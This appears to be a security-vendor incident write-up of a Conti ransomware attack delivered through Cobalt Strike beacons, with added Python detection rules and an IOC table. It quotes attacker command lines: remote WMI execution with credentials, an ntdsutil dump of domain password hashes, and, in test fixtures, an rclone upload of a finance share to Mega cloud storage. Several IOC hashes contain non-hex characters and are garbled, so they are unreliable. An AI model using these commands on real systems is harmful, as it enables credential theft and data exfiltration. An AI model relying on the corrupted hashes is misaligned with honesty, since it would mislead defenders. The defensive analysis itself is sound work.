In February of 2021, we were alerted to a series of suspicious events connected to an attack by the Conti ransomware gang. These events were spotted by the Trend Micro Vision One platform.
Conti has been described as the successor to the popular Ryuk ransomware family. Increasingly, threat actors are now distributing the malware via the same methods used to distribute Ryuk in the past. For example, both Trickbot/Emotet and BazarLoader are now being used to distribute Conti.
This blog post discusses how Cobalt Strike beacons (detected as Backdoor.<architecture>.COBEACON.SMA) are now being used for this purpose, and how we used the Trend Micro Vision One platform to track this threat. We believe that researchers at Sophos also encountered this particular group of threat actors; the attack they encountered and this one show similarities in the techniques used.
Finding the Threat
These attacks were spotted via the Workbench panel, which is accessible both to the SOCs of client organisations as well as MDR researchers. It can be used to help respond to ongoing incidents, as well as add context to any ongoing security investigations.
We saw sys64.dll (the Cobalt Strike beacon) being ordered to execute on a remote machine in this Workbench alert. The parent process is winlogon.exe, which is generally used for handling logon-related tasks. This makes the launch of sys64.dll quite suspicious.
This second alert is similar to the first, but instead of running sys64.dll, it executes vd.exe, which is also the Cobalt Strike beacon file. The command here is:
wmic /node:{IP address} /user:"<domain>\<user>" /password:"<password>" process call create "cmd /c C:\vd.exe"
Upon inspecting the events using the Search App, we see that these system executables are being subjected to process injection with the Cobalt Strike beacon code (vd.exe), as indicated by the telemetry event “701 – TELEMETRY_MODIFIED_PROCESS_CREATE_REMOTETHREAD”.
The attackers then attempted to dump domain password hashes using ntdsutil, saving the results as c:\windows\temp\abc for later use:
C:\Windows\system32\cmd.exe /C ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abc" q q
The attacker didn’t immediately carry out any further malicious activity. Instead, several hours later, they started to deploy the Conti ransomware payload, which Trend Micro’s Predictive Machine Learning immediately detected. The file xx.dll is currently detected as Ransom.Win64.CONTI.A.
The CONTI ransomware deployment was followed by the ransom note being detected on several endpoints.
Missing: The Arrival Vector
What was not immediately clear was the arrival vector of the Cobalt Strike beacon. We delved deeper into this using the different features of Trend Micro Vision One.
Using Trend Micro Vision One’s Observed Attack Techniques (OAT) app, we noticed that several endpoints only started to send data to Trend Micro Vision One on February 11 and 12 of this year. Once we checked more telemetry, we were able to confirm that this was the case.
Feedback provided by the Smart Protection Network indicates possible Cobalt Strike beacon detections in the same organisation on February 4. This may have been a first attempt to infiltrate the organisation that did not see initial success.
Beyond this possible earlier attempt, we were unable to identify the specific method used for the initial attack. The threat actor may have initiated the attack on endpoints that were unprotected or otherwise not monitored.
Responding to Incident Response
As we noted earlier, the organisation was responding to the attack by rolling out further protection to their endpoints. The threat actor was seemingly aware of this. In response, they moved to exfiltrate sensitive information as quickly as they could.
The OAT app showed several Trend Micro Vision One Filter hits related to “Rarely Accessed IP Address.” Expanding the details revealed where they stored the stolen data.
The open-source tool “Rclone” is normally used to sync files to a specified cloud storage provider. In this incident, the attackers used the tool to upload files to Mega cloud storage.
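The command lines quoted earlier (the WMI remote process creation and the ntdsutil IFM dump) and the Rclone upload described here are all visible in process-creation telemetry. The following Python is an added example, not code from the post or from Trend Micro Vision One: a small rule set run over constructed sample events. The event shape, the host IP address, the share path and the rule names are assumptions made for the example; the rules only encode the techniques the post describes.

```python
import re
from dataclasses import dataclass
from typing import List, Pattern, Tuple


@dataclass
class ProcessEvent:
    """One process-creation telemetry record (constructed shape, not a real product schema)."""
    parent_image: str
    image: str
    command_line: str


# Processes the post names as injection hosts for the beacon.
INJECTION_HOSTS = {"winlogon.exe", "wininit.exe", "wusa.exe"}

# A payload sitting directly under C:\, C:\ProgramData\ or C:\Temp\ (the drop
# locations described in the post); deeper paths such as C:\Windows\... do not match.
DROP_PATH: Pattern[str] = re.compile(
    r"\bC:\\(?:ProgramData\\|Temp\\)?[^\\\s\"]+\.(?:exe|dll|bat)\b", re.IGNORECASE)

# Command-line rules, one per technique described in the post.
RULES: List[Tuple[str, Pattern[str]]] = [
    # wmic /node:<ip> ... process call create "<cmd>"  (remote execution)
    ("remote_wmi_process_create",
     re.compile(r"\bwmic(?:\.exe)?\b.*/node:.*\bprocess\s+call\s+create\b", re.I)),
    # ntdsutil "ac in ntds" "ifm" "cr fu <dir>"  (abbreviated 'create full' IFM dump)
    ("ntdsutil_ifm_dump",
     re.compile(r"\bntdsutil\b.*\bifm\b.*\bcr(?:eate)?\s+fu(?:ll)?\b", re.I)),
    # rclone copy/sync/move ... mega:<remote>  (upload to Mega cloud storage)
    ("rclone_cloud_upload",
     re.compile(r"\brclone(?:32|64)?(?:\.exe)?\b.*\b(?:copy|sync|move)\b.*\bmega:", re.I)),
]


def evaluate(event: ProcessEvent) -> List[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits = [name for name, pattern in RULES if pattern.search(event.command_line)]
    # A beacon-injected system process launching a payload from a drop directory.
    if event.parent_image.lower() in INJECTION_HOSTS and DROP_PATH.search(event.command_line):
        hits.append("injected_host_spawns_dropped_file")
    return hits


def scan(events: List[ProcessEvent]) -> List[Tuple[str, List[str]]]:
    """Return (image, matched_rules) for every event that triggered at least one rule."""
    flagged = []
    for event in events:
        hits = evaluate(event)
        if hits:
            flagged.append((event.image, hits))
    return flagged


# Constructed sample telemetry (not taken from the incident); the command lines
# mirror the techniques described in the post, with a benign event as a control.
SAMPLE_EVENTS = [
    ProcessEvent("winlogon.exe", "wmic.exe",
                 r'wmic /node:10.0.0.25 /user:"corp\admin" /password:"REDACTED" process call create "cmd /c C:\vd.exe"'),
    ProcessEvent("winlogon.exe", "cmd.exe",
                 r'C:\Windows\system32\cmd.exe /C ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abc" q q'),
    ProcessEvent("cmd.exe", "rclone32.exe",
                 r'C:\ProgramData\rclone32.exe copy D:\Shares\Finance mega:backup'),
    ProcessEvent("wininit.exe", "rundll32.exe",
                 r'rundll32.exe C:\ProgramData\sys64.dll,#1'),
    ProcessEvent("explorer.exe", "notepad.exe",
                 r'"C:\Windows\system32\notepad.exe" C:\Users\alice\notes.txt'),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image:14s} -> {', '.join(hits)}")
```

The parent-process rule is deliberately narrow: a command line referencing a file directly under one of the drop roots is only flagged when the parent is one of the system processes the beacon was seen injected into, which keeps ordinary installers writing to C:\ProgramData\ out of the alert stream.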
Additional Cobalt/Cobeacon variants were seen a few days after the ransomware incident, indicating that the attackers still had access to unprotected endpoints.
Cobalt Strike Lateral Movement Techniques
The post-investigation timeline now looks like this:
We will now briefly describe how Cobalt Strike was able to spread itself and the Conti ransomware across the network.
Cobalt Strike's ability to access and dump credential hashes from LSASS lets the attackers recover passwords and use them for further lateral movement.
Cobalt/Cobeacon makes use of cmd.exe copy commands to send files to remote drives. It can be directly issued from the injected process (including winlogon.exe, wininit.exe, and wusa.exe) or use a batch script as an added layer.
The components are usually dropped in the following paths:
- C:\
- C:\ProgramData\
- C:\Temp\
On the remote endpoint, the file creation will be initiated by ntoskrnl.exe. This behaviour can be paired with other Cobalt/Cobeacon behaviours to check for breaches, or used on its own to monitor files created via this method, since it saves files in suspicious paths.
The same is also true when it sends the commands to execute copies of itself on the remote endpoints.
Aside from using scheduled tasks, it uses WMI commands to run either a DLL or EXE copy of itself, as seen in Figure 2.
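To show how the file-creation and execution behaviours in this section can be correlated rather than matched one event at a time, the following Python is an added example, not the post's or the product's code. It assumes a constructed telemetry shape (file-creation events attributed to ntoskrnl.exe, process-creation events carrying a command line), the drop directories listed above, and a two-hour correlation window; the host names, timestamps and the attribution of the launch method to WmiPrvSE.exe or schtasks are example assumptions.

```python
import ntpath
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple


@dataclass
class Event:
    """One telemetry record (constructed shape, not a real product schema)."""
    ts: datetime
    host: str
    kind: str      # "file_create" or "process_create"
    actor: str     # process that created the file, or image of the new process
    target: str    # file path for file_create, full command line for process_create


@dataclass
class Alert:
    host: str
    path: str
    method: str    # "wmi", "scheduled_task" or "other"
    delay: timedelta


# Drop directories named in the post, compared case-insensitively.
DROP_DIRS = {"c:", r"c:\programdata", r"c:\temp"}
# The post notes that a remote copy appears on the target as a file created by ntoskrnl.exe.
REMOTE_WRITER = "ntoskrnl.exe"


def is_drop_path(path: str) -> bool:
    """True when the file sits directly in one of the drop directories."""
    return ntpath.dirname(path).lower().rstrip("\\") in DROP_DIRS


def launch_method(ev: Event) -> str:
    """Classify how a dropped file was started (assumed parent/command-line heuristics)."""
    actor, cmd = ev.actor.lower(), ev.target.lower()
    if actor == "wmiprvse.exe":                       # remote 'process call create' lands under the WMI host
        return "wmi"
    if "schtasks" in cmd or actor == "svchost.exe":   # task being created, or launched by the Schedule service
        return "scheduled_task"
    return "other"


def correlate(events: List[Event], window: timedelta = timedelta(hours=2)) -> List[Alert]:
    """Alert when a remotely written drop-directory file is executed on the same host within `window`."""
    dropped: Dict[Tuple[str, str], datetime] = {}   # (host, lowercase path) -> creation time
    alerts: List[Alert] = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "file_create":
            if ev.actor.lower() == REMOTE_WRITER and is_drop_path(ev.target):
                dropped[(ev.host, ev.target.lower())] = ev.ts
        elif ev.kind == "process_create":
            cmd = ev.target.lower()
            for (host, path), created in dropped.items():
                if host == ev.host and path in cmd and ev.ts - created <= window:
                    alerts.append(Alert(ev.host, path, launch_method(ev), ev.ts - created))
    return alerts


# Constructed sample stream: two remote drops followed by execution, a write to a
# non-drop directory, benign local activity on another host, and a late execution.
T0 = datetime(2021, 2, 11, 3, 0, 0)   # constructed timestamp
SAMPLE_EVENTS = [
    Event(T0,                        "HOST-B", "file_create",    "ntoskrnl.exe", r"C:\vd.exe"),
    Event(T0 + timedelta(minutes=1), "HOST-B", "file_create",    "ntoskrnl.exe", r"C:\Temp\tup3.bat"),
    Event(T0 + timedelta(minutes=1), "HOST-B", "file_create",    "ntoskrnl.exe", r"C:\Windows\Temp\abc"),
    Event(T0 + timedelta(minutes=2), "HOST-B", "process_create", "WmiPrvSE.exe", r"cmd /c C:\vd.exe"),
    Event(T0 + timedelta(minutes=3), "HOST-B", "process_create", "cmd.exe",
          r'schtasks /create /tn upd /tr "C:\Temp\tup3.bat" /sc once /st 00:00'),
    Event(T0 + timedelta(minutes=5), "HOST-C", "file_create",    "explorer.exe", r"C:\Temp\notes.txt"),
    Event(T0 + timedelta(minutes=6), "HOST-C", "process_create", "explorer.exe", r"notepad C:\Temp\notes.txt"),
    Event(T0 + timedelta(hours=3),   "HOST-B", "process_create", "cmd.exe",      r"C:\vd.exe"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(f"{alert.host}: {alert.path} executed via {alert.method} {alert.delay} after remote drop")
```

The two signals are weak on their own (files land in C:\Temp\ all day, and WMI starts processes legitimately); tying a remote write into a drop directory to an execution of that exact path on the same host within a short window is what turns them into a lateral-movement alert.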
Security Recommendations
While we do not know how this threat first entered the victim organisation, Conti is known for using phishing emails to deliver downloader malware that drops the ransomware payload. Awareness and training to handle potential social engineering risks will help reduce the risk.
Trend Micro’s comprehensive XDR solution applies the most effective expert analytics to the deep data sets collected from Trend Micro solutions across the enterprise — including email, endpoints, servers, cloud workloads, and networks — making faster connections to identify and stop attacks. Powerful artificial intelligence (AI) and expert security analytics correlate data from customer environments and Trend Micro’s global threat intelligence to deliver fewer, higher-fidelity alerts, leading to better, early detection. One console with one source of prioritised, optimised alerts supported with guided investigation simplifies the steps needed to fully understand the attack path and impact on the organisation.
IOCs
| Filename | Detection | Purpose | SHA256 |
|---|---|---|---|
| sys64.dll | Backdoor.Win64.COBEACON.SMA | Wave 1 | Unable to retrieve (from SPN data) |
| tup2.bat | Trojan.BAT.COBALSTART.A | creates scheduled task for s.bat | 4cfb525902490909512d065a59ae820c99aec6129f7ea785d89bc20e7f7384509 |
| tup3.bat | Trojan.BAT.COBALSTART.A | creates scheduled task for vd.exe | 0043aa3c5236d901333db1a4c9e0fd6e40a27b3f5330bca8a59de78e30758334 |
| s.bat | Trojan.BAT.CONTISTART.A | Executes xx.dll | 52c851fc784e175cd2a029abfad62d3bf0408bed85d77d4f94d363e892bc4d60 |
| xx.dll | Ransom.Win64.CONTI.A | For ransomware file encryption | cb6eac0222102b6dcb72386aea373e89640f7c3a335591b561e56f35633f2bda |
| sys64.dll | Backdoor.Win64.COBALT.AG | Communicate with C&C | 105d2eef1c6802e2ba3da84afe5ed91e986b55e77fefe1b6a203d3131ead6269 |
| vd.exe/v.exe | Backdoor.Win64.COBALT.AH | Communicate with C&C | c27875b0053bdddbfd121d21dc3cdb8bbf41091c8a8a0614c666aec8b4d3b612 |
| rclone32.exe | N/A | Exfiltration tool | eb03aba46e818640013bfe6b94367cae216a9ad02dabe69f241e3ace3f1a9f37 |
| at.dll | Trojan.Win64.ROZENA.AJ | Wave 3 – Cobalt Strike beacon | 1c947639aec826b462e6c36416c873d26c11b081de707d9b5d963e30b59d9234d |
| up.dll | Trojan.Win64.ROZENA.AJ | Wave 3 – Cobalt Strike beacon | 246907de4674c7a327a1a0b7coe92e50edd7cd02f56d6a008acc134f5fb5bb71c |
| up.dll | Trojan.Win64.ROZENA.AJ | Wave 3 – Cobalt Strike beacon | d1c1e7edc840a0623e0fdc9f2689133339e3coe58da1e24bce513a4673b9coe054 |
C&C Server:
IP Address: 23[.]82[.]128[.]116
Domain Name: secost[.]com